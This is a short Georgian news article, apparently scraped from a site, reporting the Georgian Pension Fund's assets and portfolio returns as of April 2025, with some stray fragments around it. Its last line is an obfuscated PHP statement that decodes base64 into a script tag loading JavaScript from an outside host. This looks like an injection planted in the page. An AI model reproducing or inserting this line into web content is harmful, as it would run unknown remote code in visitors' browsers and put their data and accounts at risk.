gorgia
ავერსი jaluzi

2025 წლის 30 აპრილის მდგომარეობით, საქართველოს საპენსიო ფონდის აქტივების მოცულობამ – 6.7 მილიარდ ლარს, ხოლო ჯამურმა დაგენერირებულმა ამონაგებმა 1.6 მილიარდ ლარს მიაღწია.

საპენსიო ფონდის ინფორმაციით, 2025 წლის აპრილში დინამიკურმა პორტფელმა ყველაზე მაღალი ამონაგები აჩვენა და, წინა თვესთან შედარებით, 0.8%-ით გაიზარდა, მაშინ როცა დაბალანსებულმა და კონსერვატიულმა პორტფელებმა თანაბარი – 0.7%-იანი თვიური ზრდა დააფიქსირეს.

„წლიურ ჭრილში, კერძოდ, 2023 წლის 6 აგვისტოდან 2025 წლის 30 აპრილის ჩათვლით პერიოდში დინამიკური პორტფელის ნომინალურმა ამონაგებმა 12.1% (გაწლიურებული) შეადგინა, იმავე პერიოდში დაბალანსებული და კონსერვატიული პორტფელების ნომინალური ამონაგები, შესაბამისად, 11.7% და 11.2% იყო.

აღნიშნულ პორტფელებს შორის მთავარი სხვაობა პორტფელებში გლობალური აქციების პროპორციაა. აპრილის ბოლოს მდგომარეობით, დინამიკურ პორტფელში აქციების წილი – 48.0%, დაბალანსებულში – 30.1%, ხოლო კონსერვატიულში 16.1% იყო“, – აღნიშნულია საპენსიო ფონდის ინფორმაციაში.

122
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");